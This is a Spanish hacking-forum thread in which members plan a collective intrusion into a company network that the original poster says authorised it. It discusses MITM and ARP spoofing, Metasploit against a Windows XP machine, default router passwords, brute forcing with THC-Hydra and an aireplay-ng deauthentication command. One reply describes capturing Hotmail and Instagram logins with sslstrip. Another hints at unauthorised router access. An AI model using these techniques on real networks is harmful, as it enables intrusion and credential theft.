Bueno brodels, con esto yo creo que podemos dar por concluida la 1ª fase del post. Recordad que el objetivo del post es llevar a cabo un ataque conjunto donde toda la comunidad participe. Ya tenemos un escenario más o menos claro. Hay escaneos de todos los hosts con puertos abiertos, servicios, un mapeado más o menos claro de la red (evidentemente todavía hay que avanzarlo más), hay una lista de todos los comandos que acepta el router por telnet... Tenéis todo lo necesario para dejar de relameros los dientes y empezar a pegar bocados, así que a partir de ahora... SE ABRE LA VEDA!! Podéis empezar a plantear ideas, posibles ataques, métodos de escaneo y mapeado alternativos... Podéis pedirme que os proporcione otros datos en concreto... LO QUE SEA!!!
Afilad los cuchillos HackXCrack... nos vamos de caza!
PD: Proximamente publicaré un escaneo de vulnerabilidades con metasploit.
Título: Re:Diario de un Ataque
Publicado por: tzspy en Junio 22, 2012, 02:21:21 am
woow que divertido!! que bueno backtrack
Título: Re:Diario de un Ataque
Publicado por: odeveku en Junio 22, 2012, 02:26:50 am
Nuevos capitulos:
MULTIDIFUSIÓN UPnP
MIRANDA (En proceso)
Por lo que me estoy encontrando vamos a necesitar a algún experto en XML para seguir avanzando ;D
Título: Re:Diario de un Ataque
Publicado por: miyamoto340 en Junio 22, 2012, 10:49:13 am
Al estar ya en la red por que no hacer un MITM? Cual es el objetivo del ataque?
Título: Re:Diario de un Ataque
Publicado por: odeveku en Junio 22, 2012, 11:32:34 am
Al estar ya en la red por que no hacer un MITM? Cual es el objetivo del ataque?
Bien miyamoto! Estaba esperando a que alguien lo propusiera, no quiero que esto sea un simple tuto hecho por mi, la idea es que todos participeis.
A que maquina atacarias con un MITM y en que puertos? El objetivo es hacerse con el control de toda la red, o por lo menos de alguna máquina.
Ok, el único PC es este:192.168.1.34 y el tuyo. Si le hacemos un MITM y observamos los puertos con los que accede a las cámaras,1501-1508 tarde o temprano tendrá que loggearse o si ya lo está podremos sacarle una cookie. Si tenemos que acceder a la máquina vemos que es un windows XP o similar, no deberia haber problemas en rebentarlo con metasploit.
Título: Re:Diario de un Ataque
Publicado por: odeveku en Junio 22, 2012, 12:09:05 pm
Al estar ya en la red por que no hacer un MITM? Cual es el objetivo del ataque?
Bien miyamoto! Estaba esperando a que alguien lo propusiera, no quiero que esto sea un simple tuto hecho por mi, la idea es que todos participeis.
A que maquina atacarias con un MITM y en que puertos? El objetivo es hacerse con el control de toda la red, o por lo menos de alguna máquina.
Ok, el único PC es este:192.168.1.34 y el tuyo. Si le hacemos un MITM y observamos los puertos con los que accede a las cámaras,1501-1508 tarde o temprano tendrá que loggearse o si ya lo está podremos sacarle una cookie. Si tenemos que acceder a la máquina vemos que es un windows XP o similar, no deberia haber problemas en rebentarlo con metasploit.
De acuerdo ;D Se abren 2 capitulos más:
MITM(En construcción)
METASPLOIT(En construcción)
PD: Estoy de acuerdo en todo lo que has dicho, pero también puede existir la posibilidad de que el PC 192.168.1.34 se trate de un PC de trabajo y nunca acceda a las cámaras. Podría darse el caso de que a las cámaras solo se acceda a través del NAT desde fuera de la red para controlar a los empleados. De cualquier manera la mejor forma de salir de dudas es comprobandolo!
Título: Re:Diario de un Ataque
Publicado por: miyamoto340 en Junio 22, 2012, 12:32:40 pm
Si no se conecta desde dentro, no sería necesario un servidor? Y en ese caso no estaría montado en ese PC?
Título: Re:Diario de un Ataque
Publicado por: odeveku en Junio 22, 2012, 01:47:28 pm
Mmmm... no se hasta que punto sería necesario un servidor para conectarse a las cámaras... puede que la propia cámara almacene un archivo de configuración con el login y el password y simplemente verifique que són correctos cuando le llega una conexión. Hay una IP dentro de la red que lleva mosqueandome desde que empezamos el ataque, es la 192.168.1.10, ya que el Nmap la detecta como un router, lo cual no me cuadra. Puede que se trate de un servidor.
EDITO: Hace un rato ya que estoy corriendo un ataque MITM con "yamas" y por el momento ha detectado que de vez en cuando desde las cámaras se realiza una conexión a esta dirección prov.eu.mydlink.com, si buscamos esta dirección en google nos encontramos con http://eu.mydlink.com/entrance , donde podemos ver una pestaña de Login y otra de Password. Así que parece que para acceder a las cámaras desde fuera de la LAN la conexión se realiza a través de un servidor externo que no tiene nada que ver con la red. Por el formato del Login podemos deducir que el Login para acceder a las cámaras es un email, así que nuestra prioridad pasa a ser la de capturar un email y su correspondiente password, ya que muy poca gente cambia de de contraseña según la pagina. Postearé los resultados del MITM al final del día.
EDITO2: Y aquí tenemos un video de como se accede a las cámaras por cortesía de D-Link:
feature=player_embedded#
Título: Re:Diario de un Ataque
Publicado por: odeveku en Junio 23, 2012, 01:16:01 pm
Vale BlindOwl, voy a intentar averiguar más cosas de esa ip. Gracias por el aporte!
Llevo corriendo un MITM desde ayer por la mañana y todavía no ha pillado nada útil. Voy a seguir con ello un poco más y si no sale nada revisaré que está pasando porque algo no va bien. Sabéis si se pueden correr varios ataques de arpspoof a la vez? En plan:
Título: Re:Diario de un Ataque
Publicado por: Byte Sec en Junio 25, 2012, 08:39:12 pm
Excelente Trabajo, En verdad me has enseñado bastante. Esperare por el desenlace :D.
Título: Re:Diario de un Ataque
Publicado por: coco en Junio 25, 2012, 10:46:49 pm
Seria bueno analisar el trafico de su red para conoserlo un poco mas y talvez usariamos la ingenieria social otra obccion , pero si ya estas en la red porque no entrar en la configuraccion del router por lo general muchos lo dejan la contrasena por defecto tanto las camaras .
Título: Re:Diario de un Ataque
Publicado por: odeveku en Junio 26, 2012, 09:35:04 pm
Seria bueno analisar el trafico de su red para conoserlo un poco mas y talvez usariamos la ingenieria social otra obccion , pero si ya estas en la red porque no entrar en la configuraccion del router por lo general muchos lo dejan la contrasena por defecto tanto las camaras .
Ya hemos entrado en el router, la contraseña por defecto era 1234, hay una captura de pantalla de la interfaz gráfica del router en el post. La ingeniería social en este caso no es una opción ya que la empresa está informada del ataque y lo permite. Ya hemos comprobado de diversas formas que las contraseñas de las cámaras no son las típicas por defecto. Te has leido el post?
En cuanto a lo del análisis de tráfico puedo subir una captura con wireshark para que veáis que es lo que pilla.
PD: Estos días el post está un poco parado porque estoy de viaje, tan pronto como termine volveré a actualizarlo. Salu2!!
Título: Re:Diario de un Ataque
Publicado por: coco en Junio 29, 2012, 07:09:16 pm
Seria bueno analisar el trafico de su red para conoserlo un poco mas y talvez usariamos la ingenieria social otra obccion , pero si ya estas en la red porque no entrar en la configuraccion del router por lo general muchos lo dejan la contrasena por defecto tanto las camaras .
Ya hemos entrado en el router, la contraseña por defecto era 1234, hay una captura de pantalla de la interfaz gráfica del router en el post. La ingeniería social en este caso no es una opción ya que la empresa está informada del ataque y lo permite. Ya hemos comprobado de diversas formas que las contraseñas de las cámaras no son las típicas por defecto. Te has leido el post?
En cuanto a lo del análisis de tráfico puedo subir una captura con wireshark para que veáis que es lo que pilla.
PD: Estos días el post está un poco parado porque estoy de viaje, tan pronto como termine volveré a actualizarlo. Salu2!!
Tienes razon no mire bien el post , espero publiques lo que capturaste con el wireshark para hecharle una mirada saludos.
Título: Re:Diario de un Ataque
Publicado por: djtux en Julio 03, 2012, 10:51:51 pm
Muy buen aporte, lo e intentado con dos router diferentes y me a funcionando correctamente además leyendo un poco en los nuevos cuadernillos. Mi a interesado mucho este tema así que gracias por el aporte.
Título: Re:Diario de un Ataque
Publicado por: kid_goth en Julio 04, 2012, 03:51:11 pm
Odeveku voy a ir sacando esto en un PDF y cuando se termine lo publico si no es problema?
:D ta muy gueno jejeje
Título: Re:Diario de un Ataque
Publicado por: odeveku en Julio 04, 2012, 05:28:44 pm
Claro Kid, sin problemas. ;) Pero mejor esperar a que este terminado no?
Título: Re:Diario de un Ataque
Publicado por: kid_goth en Julio 04, 2012, 05:31:31 pm
Claro Kid, sin problemas. ;) Pero mejor esperar a que este terminado no?
:D claro pero para ir maquetando desde ya xD que quede bonito jejee
Título: Re:Diario de un Ataque
Publicado por: @NetFcruz en Julio 04, 2012, 09:12:23 pm
Esta muy bueno este post lo practicare, espero terminarlo pronto, test.
Título: Re:Diario de un Ataque
Publicado por: keyjo2210 en Julio 05, 2012, 05:49:06 pm
Muy buen aporte, esto demuestra que si hay talento muy excecional en esta comunidad, gracias por brindar este conocimiento a todos,
saludos..........
Título: Re:Diario de un Ataque
Publicado por: garses69 en Julio 07, 2012, 10:12:03 pm
hermano me parece un excelente aporte aunque tendria que mencionar que dejamos a la suerte muchos de nuestros procedimientos como ejemplo te menciono el hecho de que nuestro router esta configurado con valores de fabrica, eso seria muy poco probable si lo que estamos haciendo es intentar a una LAN respatable. para ser honesto no tengo idea de como crakear un router pero creo que la finalidad de este ejercicio es llegar hasta lo mas profundo del tema espero podramos encontrar la respuesta a esta interrogante SALUDOS!!!
Título: Re:Diario de un Ataque
Publicado por: @NetFcruz en Julio 08, 2012, 11:38:22 pm
Kid de acuerdo haz el video, para bajar el material y ahora si poderpracticarlo en casa mas trankilo.
Título: Re:Diario de un Ataque
Publicado por: kid_goth en Julio 09, 2012, 12:09:07 am
Kid de acuerdo haz el video, para bajar el material y ahora si poderpracticarlo en casa mas trankilo.
¬¬ video? :D pdf jejejejej ya casi igual odeveku tiene que dar el visto bueno ;)
Si kid loke tu digas, saludos, voy uy bien en el test, jiji.
Título: Re:Diario de un Ataque
Publicado por: [email protected] en Julio 18, 2012, 07:25:15 pm
Buen post, ya que estamos podriamos intentar meterle mano a alguna de las camaras, por si suena la flauta y podemos aprovechar algunas deficiencias en seguridad del RTSP, te dejo un aperitivo que podría resultar:
Aparte ese XP que aparece en el resultado del escaneo con Nmap parece tener alguna papeleta que podría dar premio, pero veo que ya lo vas a "tentar" con Metasploit....a la espera de resultados ;)
Un saludo.
Título: Re:Diario de un Ataque
Publicado por: salamancageek en Julio 30, 2012, 11:16:56 am
Muy buen aporte, deseando verlo todo acabado. Mucho curro
Título: Re:Diario de un Ataque
Publicado por: CrashOveride en Agosto 15, 2012, 05:51:41 pm
Para cuando un nuevo diario? :D
Título: Re:Diario de un Ataque
Publicado por: @NetFcruz en Agosto 15, 2012, 06:36:41 pm
Relamente no termino todo aun.XD
Título: Re:Diario de un Ataque
Publicado por: CrashOveride en Agosto 15, 2012, 07:04:06 pm
Pues fijate que en mi empresa, hay camaras de vigilancia, tienen una torreo especial para monitorear esas camaras, me agradaria que me ayudases a darle con todo XD
Título: Re:Diario de un Ataque
Publicado por: @NetFcruz en Agosto 15, 2012, 07:13:36 pm
Jjeeje. tambn en la mia y se obsrvan de modo externo jejjee, lo ke kiero es entra y tapar esos hoyos asi como el manual, XD
Título: Re:Diario de un Ataque
Publicado por: PuntoCiego en Agosto 15, 2012, 07:50:47 pm
Interesante. ya que has mencionado Wireshark podrías sniffar y el resultado, es decir los pcap los podrías visualizar con la tool Xplico, de este modo se tiene algo mucho mas "visual".
Título: Re:Diario de un Ataque
Publicado por: coco en Agosto 16, 2012, 05:45:14 pm
Interesante. ya que has mencionado Wireshark podrías sniffar y el resultado, es decir los pcap los podrías visualizar con la tool Xplico, de este modo se tiene algo mucho mas "visual".
Es buena idea pero lo que interesa ahorita es tener acceso a esas camaras lo que savemos esas camaras estan conectadas al router hoy en dia muchos duenos de negocios usan sus telefonos para monitoriar sus empresas una cámara IP a un router y por verla de cualquier parte para esto usaremos el servidor DYNDNS vamos a esta pagina www.dyndns.org hasemos nuestra cuenta y ya podremos acceder a nuestras camaras que por lo general la ip es 192.168.0.1 muy paresida a la de las camaras que queremos entrar el punto es que para esto el dueno o administrador tuvo que poner una cuenta de correo y una contrasena para entrar a esa cuenta del servidor DYNDNS .
Título: Re:Diario de un Ataque
Publicado por: @NetFcruz en Agosto 17, 2012, 05:01:41 pm
Se sirve mucho una cuenta de ese tipo, montare un par con esa cuenta.
Título: Re:Diario de un Ataque
Publicado por: stakewinner00 en Agosto 17, 2012, 05:26:45 pm
Muy interesante.
Título: Re:Diario de un Ataque
Publicado por: @NetFcruz en Agosto 17, 2012, 05:52:07 pm
Primero a terminar el manual XD. Despues lo demas.
Título: Re:Diario de un Ataque
Publicado por: Jukathaido en Agosto 18, 2012, 10:59:15 pm
Buenas noches....teniendo acceso al router, por que no batir algún puerto del pc e intentar un exploit? Seguramente ese pc pueda tener acceso a las camaras y de esa forma, con un ataque al pc para intentar entrar con metasploit, podamos ver alguna de esas camaras....
Un saludo y espero el desenlace!!!
Título: Re:Diario de un Ataque
Publicado por: @NetFcruz en Agosto 24, 2012, 12:20:13 am
Almenos yo entre al router cisco aunke kreo ke me pillaron. Espero no me sigan ya. No es un lugar importante. BNrte.
Título: Re:Diario de un Ataque
Publicado por: vertigo en Agosto 28, 2012, 04:55:24 pm
Hola gente, acabo de registrarme aunque hace ya un tiempo que conozco el foro. Realmente, aunque me considere bastante novatillo en el tema, siempre me ha interesado muchísimo, y desde mi autodidactismo (no acostumbro a participar en los foros más que leyendo y nunca he estudiado nada relacionado) avanzo poquito a poquito, pero eficazmente.
Bueno, quería deciros que leyendo el post (muy bueno, por cierto, me gusta el proyecto) He visto el mensaje de este compañero que parece haberse registrado con el único propósito de haceros ver algo muy importante que se ha pasado por alto:
hermano me parece un excelente aporte aunque tendria que mencionar que dejamos a la suerte muchos de nuestros procedimientos como ejemplo te menciono el hecho de que nuestro router esta configurado con valores de fabrica, eso seria muy poco probable si lo que estamos haciendo es intentar a una LAN respatable. para ser honesto no tengo idea de como crakear un router pero creo que la finalidad de este ejercicio es llegar hasta lo mas profundo del tema espero podramos encontrar la respuesta a esta interrogante SALUDOS!!!
¿Qué pasaría si el administrador de la red, comprensiblemente desconfiado, hubiese cambiado los valores por defecto del router? A mi entender... no dispondríamos de todos los datos que habéis conseguido recopilar hasta ahora. Realmente, como dice el compañero más arriba, no se me ocurre ninguna otra manera de acceder al router que no sea por fuerza bruta. Me suena haber investigado el tema.. quizá haga un par de años, creo que hay un programa llamado THC-HYDRA (corregidme si me equivoco, suele pasarme jaja) que facilita este tipo de ataques a routers.
Cita de: http://www.thc.org/thc-hydra/
THC-Hydra. A very fast network logon cracker which support many different services.
Sé que ahora diréis: ¿De qué va este tío? o algo por el estilo, pero yo creo que para que el post estuviese realmente completo, deberíamos intentar abrir el router por nuestros medios y no, como dice el compañero más arriba (de nuevo) dejarlo en manos del azar... ¿qué os parecería volver un poquito atrás?
Título: Re:Diario de un Ataque
Publicado por: odeveku en Agosto 30, 2012, 02:03:46 am
Hola a todos! Lo primero de todo pedir disculpas porque el post ha estado muy parado estos meses... bueno, ya sabeis, es lo que tiene el veranito, mucha playa, mucha paella y poco tajo! En septiembre espero volver a retomarlo y seguir avanzandolo entre todos.
Dicho esto, voy a aclarar algunas cosillas. Este no es un escenario que me haya inventado yo. Tampoco es un escenario que haya preparado yo en mi casa para luego "ponerlo a prueba". Toda la red pertenece a una empresa X que por una serie de circunstancias me da carta blanca para atacarla. Asi que cuando digo que probamos la contraseña por defecto del router, y que conseguimos entrar, no es que yo lo haya "trucado" para que sea así. Es que realmente esta empresa ha mantenido durante todo este tiempo la contraseña por defecto en sus routers, por lo que desgraciadamente tengo que discrepar tanto con vertigo como con garses69 en eso de que es muy poco probable encontrar un router configurado con valores de fábrica, ya que seguramente el 80% de las redes de empresas a las que intentemos entrar tendrar esta brecha de seguridad. Obviamente si intentas entrar en telefonica, telmex o microsoft, es poco probable que te encuentres algo asi, pero las pequeñas y medianas empresas normalmente siguen siendo muy descuidadas con la seguridad de sus redes.
Pero claro, coincido con vosotros en que lo mejor es no depender de ese error humano para poder abrir una brecha de seguridad en el router, asi que si alguien sabe otro método aparte del públicado que postee y se incluirá en el post principal (esto se aplica a todos los pasos). Yo conozco otro mediante el que se pueden cambiar valores del router como la contraseña sin necesidad de introducir ningún password, pero tiene que tener UPnP activado, con el script miranda se puede hacer.
Un saludoooo hackxcrack!
Título: Re:Diario de un Ataque
Publicado por: vertigo en Agosto 30, 2012, 09:46:36 am
Odeveku, espero que no te haya molestado mi comentario xD sólo estaba puntualizando.
Aunque no estoy muy de acuerdo con esta afirmación tuya...
ya que seguramente el 80% de las redes de empresas a las que intentemos entrar tendrar esta brecha de seguridad.
Si una empresa tiene contratado un mantenimiento informático (y esto si es más habitual en pymes, ya que la mayoría de gente no tiene idea de cómo hacerlo) esta es, yo diría, de las primeras cosas que cubren. No lo digo por decir, me he encontrado casos, incluso en routers caseros.
Aclaro que ni mucho menos estoy criticando ni el post ni a los colaboradores de éste. Simplemente pienso que puestos a aprender... ¡vamos a aprender todo lo posible! ¿no? ¿y qué mejor lugar que éste, con un ejemplo práctico abordado entre todos?
P.D. Odeveku. No sé si a los demás también, pero a mí me interesa mucho el método este que comentas del UPnP con miranda. Algo he leído, aunque la verdad, muy por encima... No sé si el router que nos ocupa lo tendrá activado (?) pero ¿podrías dar un poquito más de info sobre éste método?
Gracias y disculpas de nuevo si alguien se ha sentido criticado o algo :S
Título: Re:Diario de un Ataque
Publicado por: x-MaS en Septiembre 01, 2012, 08:11:23 pm
Tio esta wapo este post ^^ estoy deseando de que sigas con el siguiente capitilo! :D
Título: Re:Diario de un Ataque
Publicado por: elASPERO en Septiembre 04, 2012, 06:12:53 am
una pregunta todo esto se aprende con las revistas??
Título: Re:Diario de un Ataque
Publicado por: Hades en Septiembre 04, 2012, 11:00:30 am
te sacastes mas que un 10 carnal, esperando la 2da parte
Título: Re:Diario de un Ataque
Publicado por: hackmundy en Septiembre 05, 2012, 11:13:59 pm
Super info muchas gracias le echare una leida , gracias
Saludos..
Título: Re:Diario de un Ataque
Publicado por: @NetFcruz en Septiembre 24, 2012, 06:27:36 pm
Muy bueno la verdad el mio es un poco diferente pero es la idea XD.
Título: Re:Diario de un Ataque
Publicado por: Raven en Septiembre 25, 2012, 03:34:10 pm
Un post muy interesante =p.
Título: Re:Diario de un Ataque
Publicado por: SIRIUSBOY en Octubre 26, 2012, 06:22:29 am
excelente post muy bien explicado... :) bases solidas de como infiltarse en una red... 8)
Título: Re:Diario de un Ataque
Publicado por: stop_kam en Noviembre 06, 2012, 02:48:39 pm
Buenisimo!!! Celebro un buen aporte!
Título: Re:Diario de un Ataque
Publicado por: muten roshi en Diciembre 05, 2012, 04:48:18 pm
hola amigos que wena pinta tiene esto no se acabara el post¿ saludos
Título: Re:Diario de un Ataque
Publicado por: odeveku en Febrero 10, 2013, 08:13:34 pm
Hola de nuevo HxC! Lamentablemente el post no se va a continuar. La empresa a la que pertenecía la red que estabamos atacando ha cerrado (hay que joderse con la crisis). Asi que nada gente, es una pena pero aquí nos quedamos. Salu2 a to2.
Título: Re:Diario de un Ataque
Publicado por: xplot32 en Febrero 27, 2013, 09:16:01 pm
mis respetos amigo ;D
Título: Re:Diario de un Ataque
Publicado por: [email protected] en Marzo 11, 2013, 06:15:15 pm
No se podria reemprender el proyecto en un nuevo escenario? Creo que hablo por todos los lectores del post que nos gustaria una continuacion, aunque sea en otro entorno ya que nos ha dado mucho tema para calentarse la sesera.
Título: Re:Diario de un Ataque
Publicado por: alguacil en Marzo 13, 2013, 05:59:16 pm
Hola buen día, me estoy iniciando en este campo y tengo una duda todo lo que comentas en tu diario se puede hacer en Windows??
Saludos y muchas gracias por su ayuda.
Excelente aporte para todos y más para los que estamos iniciando.
Título: Re:Diario de un Ataque
Publicado por: fran12 en Marzo 22, 2013, 04:05:23 am
Muy pero muy buen post :) espero ansiosamente la segunda fase de tu post.
Título: Re:Diario de un Ataque
Publicado por: marquesdesade en Marzo 30, 2013, 07:01:25 am
hola tengo algunos problemas con airodump, me gustaria que me pudieran ayudar, gracias
Título: Re:Diario de un Ataque
Publicado por: File en Marzo 30, 2013, 07:21:36 am
No se podria reemprender el proyecto en un nuevo escenario? Creo que hablo por todos los lectores del post que nos gustaria una continuacion, aunque sea en otro entorno ya que nos ha dado mucho tema para calentarse la sesera.
Creo q esta es una muy buena sugerencia... haber si la retoman
Título: Re:Diario de un Ataque
Publicado por: Daniel Martinez en Abril 03, 2013, 06:20:03 pm
Hola buen día, me estoy iniciando en este campo y tengo una duda todo lo que comentas en tu diario se puede hacer en Windows??
Saludos y muchas gracias por su ayuda.
Excelente aporte para todos y más para los que estamos iniciando.
de hecho que si se puede hacer en Windows, incluso se hace mas rápido el trabajo y es mas practico.
Título: Re:Diario de un Ataque
Publicado por: larson32 en Julio 19, 2013, 12:44:54 am
me gustaria una segunda edicion de este post... muy insuperable la iniciativa
Título: Re:Diario de un Ataque
Publicado por: djduck7 en Agosto 24, 2013, 09:59:59 am
Excelente Post Amigo esty ancioso por ver la segunda parte
Título: Re:Diario de un Ataque
Publicado por: quisqueyano en Agosto 31, 2013, 07:56:43 pm
ummm... vengo afilando mis dientes desde que coense a leer y mientras mas le mas emocion me daba y mas idea me llegaban a mi cabeza, para luego leer que la empresa cerro!! me quede vestido y alborotado, bueno para otra fiesta sera.
Título: Re:Diario de un Ataque
Publicado por: gigamurki en Noviembre 30, 2013, 04:33:19 pm
muy buen aporte, me gusto excelente sigue.
Título: Re:Diario de un Ataque
Publicado por: eth en Diciembre 06, 2013, 09:47:08 pm
Que bien documentado lo tienes si señor ;)
Título: Re:Diario de un Ataque
Publicado por: Naraku en Enero 17, 2014, 05:32:24 am
Mmmm... no se hasta que punto sería necesario un servidor para conectarse a las cámaras... puede que la propia cámara almacene un archivo de configuración con el login y el password y simplemente verifique que són correctos cuando le llega una conexión. Hay una IP dentro de la red que lleva mosqueandome desde que empezamos el ataque, es la 192.168.1.10, ya que el Nmap la detecta como un router, lo cual no me cuadra. Puede que se trate de un servidor.
EDITO: Hace un rato ya que estoy corriendo un ataque MITM con "yamas" y por el momento ha detectado que de vez en cuando desde las cámaras se realiza una conexión a esta dirección prov.eu.mydlink.com, si buscamos esta dirección en google nos encontramos con http://eu.mydlink.com/entrance , donde podemos ver una pestaña de Login y otra de Password. Así que parece que para acceder a las cámaras desde fuera de la LAN la conexión se realiza a través de un servidor externo que no tiene nada que ver con la red. Por el formato del Login podemos deducir que el Login para acceder a las cámaras es un email, así que nuestra prioridad pasa a ser la de capturar un email y su correspondiente password, ya que muy poca gente cambia de de contraseña según la pagina. Postearé los resultados del MITM al final del día.
EDITO2: Y aquí tenemos un video de como se accede a las cámaras por cortesía de D-Link:
feature=player_embedded#
Aun no termino de leer todo pero puede que la ip 192.168.1.10 sea una impresora en red =o
Título: Re:Diario de un Ataque
Publicado por: Decloban en Enero 17, 2015, 04:58:08 am
Antes de preguntar, he de agradecer bastante esta idea que habéis desarrollado. Muchas gracias.
Mi duda es la siguiente:
aireplay-ng -0 10 -a E0:90:53:4A:68:AA -c 9C:8E:99:33:4D:F0 wlan0
¿Por qué eliges en: -c 9C:8E:99:33:4D:F0 <--- esa MAC si aún no has entrado en la red? No entiendo esa parte de la instrucción.
Ya supe por qué se utilizaba "-c "MAC"" . Es el cliente de la bssid (me autorespondo)
Título: Re:Diario de un Ataque
Publicado por: [email protected] en Febrero 19, 2015, 05:22:25 pm
Estaria genial otro proyecto como este, me apuntaria como primer lector ^^
Título: Re:Diario de un Ataque
Publicado por: elshotta en Abril 11, 2016, 02:58:57 pm
esta muy bueno el post, lastima que se quedaron con metasploit pero de todas formas nos sirve para los iniciados. ;D ;D ;D :-\
Título: Re:Diario de un Ataque
Publicado por: necron en Abril 20, 2016, 05:07:39 am
una pena que se haya cortado el hilo, la verdad uno puede aprender mas rápido en grupo que solo pero bueno, espero q haya gente que quiera hacerlo, espero respuestas de quien tenga ganas de aprender en grupo simulando algún escenario, algún lab armado, cualquiera y creo debe haber varios admin x aquí debe saber elaborar un escenario similar o peor, en el cual nos tengamos q taladrar la cabeza para tratar de romperlo, por mi parte soy novato en esto, me eh quemado las pestañas leyendo sobre el tema y me apasiona, tengo un lab en mi casa pero voy muy lento debido a q no tengo ayuda y ay q leer muuuuuuuuchooooooooo para aprender, eso si lo se, espero q alguien o algunos podamos contactarnos ya se ax aqui o cualquier otro medio para compartir conocimientos, saludos
Título: Re:Diario de un Ataque
Publicado por: Dedsec en Abril 27, 2016, 10:31:30 pm
esta muy bueno el post parece que estas leyendo una historia muy bien explicado y muy bien resumido algo entretenido y de muy buen aprendisaje un saludo
Título: Re:Diario de un Ataque
Publicado por: hacker fashion en Junio 24, 2016, 10:39:59 am
Wow debo admitir que este post me gusto mucho, ojala pudieran hacer más post como este planteando diversos escenarios, de esta forma se aprende bastante.
Título: Re:Diario de un Ataque
Publicado por: ElcOcO en Junio 27, 2016, 06:31:08 am
sinceramente encuentro muy interesante el post, sobre todo aprender, el trabajo que realizaste estuvo FELOmenal, pues asi lo veo yo como novato :P que soy, espero algun dia poner aqui el diario de un atake tambien jeje. Gracias por el aporte 8)
Título: Re:Diario de un Ataque
Publicado por: manuelmorgia en Julio 06, 2016, 11:08:05 pm
Esto lo mando a marcadores para leerlo detenidamente ;D
Título: Re:Diario de un Ataque
Publicado por: xHulkMx en Julio 07, 2016, 07:22:12 pm
;D Hola odeveku:
La verdad no pude parar de leer tu post desde que lo vi se que tiene tiempo pero igual me aporto muchísimo y me puso a investigar, así aprendí mucho me abrió el panorama y me motiva ya que no entendía nada y ahora se por donde empezar.
Gracias y mucho éxito amigo. ;)
Título: Re:Diario de un Ataque
Publicado por: neocarvajal en Diciembre 02, 2016, 10:22:41 pm
Para que sea un poco más real el caso de estudio el protocolo no deberia ser web sino wpa2 ya que es lo primero que la mayoria de usuarios hace para proteger su red wifi.
Una herramienta muy buena una vez dentro de la red es ettercap (para ataques ARP Spoofing) que apoyado de iptables y sslstrip pueden obtener las credenciales de los usuarios de la red LAN que intente ingresar en cualquier formulario o login.
En casa pude realizar algunas pruebas con exito aquí les dejo unas capturas de los resultados:
Escuchando paquetes:
(http://i.imgur.com/8QhB5b9.jpg) Target introduciendo usuario en hotmail:
(http://i.imgur.com/FrsS5Qm.jpg)
Target no puede ingresar a hotmail luego de introducir datos de usuario y clave (datos POST enviados en http, texto plano a mi maquina):
(http://i.imgur.com/DWAWvfh.jpg)
Datos capturados hotmail:
(http://i.imgur.com/yp8tCyO.jpg)
Capturando datos de instagram:
(http://i.imgur.com/1dhEnbE.jpg)
Título: Re:Diario de un Ataque
Publicado por: neocarvajal en Diciembre 03, 2016, 12:54:51 am
Hola de nuevo HxC! Lamentablemente el post no se va a continuar. La empresa a la que pertenecía la red que estabamos atacando ha cerrado (hay que joderse con la crisis). Asi que nada gente, es una pena pero aquí nos quedamos. Salu2 a to2.
Con fines educativos se podría hacer el ataque en una red local propia con varios ordenadores y un router hasta lograr sacar el mejor provecho, luego seria de probar con alguna red cercana
Título: Re:Diario de un Ataque
Publicado por: larson32 en Agosto 21, 2017, 07:53:40 am
buen post
Título: Re:Diario de un Ataque
Publicado por: soldi3r en Septiembre 18, 2017, 12:38:26 am
Gracias por este artículo informativo detallado. Espero que funcione para mí.
Título: Re:Diario de un Ataque
Publicado por: OviQueNoVi en Julio 29, 2019, 11:58:37 am
Buenísimo el hilo, me ha gustado!
Título: Re:Diario de un Ataque
Publicado por: RAISSERYX en Abril 25, 2020, 07:32:38 am
buenas alguien me podría mencionar donde descargar el o los sistemas operativos que necesito para realizar un ataque completo?
soy nuevo en esta área, le agradecería mucho su colaboración.
Título: Re:Diario de un Ataque
Publicado por: R3LI4NT en Abril 25, 2020, 05:42:09 pm
buenas alguien me podría mencionar donde descargar el o los sistemas operativos que necesito para realizar un ataque completo?
soy nuevo en esta área, le agradecería mucho su colaboración.
Primero, este es un tema viejo y no es recomendable comentar en él. Segundo, si tienes algún inconveniente puedes ir a la categoría de "Dudas Generales" y plantear ahí. Un saludo!
Título: Re:Diario de un Ataque
Publicado por: rajubhaiya en Septiembre 14, 2020, 07:43:44 pm
De todas formas, si quieres preguntar algo que no tiene nada que ver con mi post, lo mejor es crear un post nuevo. https://get-mobdro.com and https://get-tubemate.com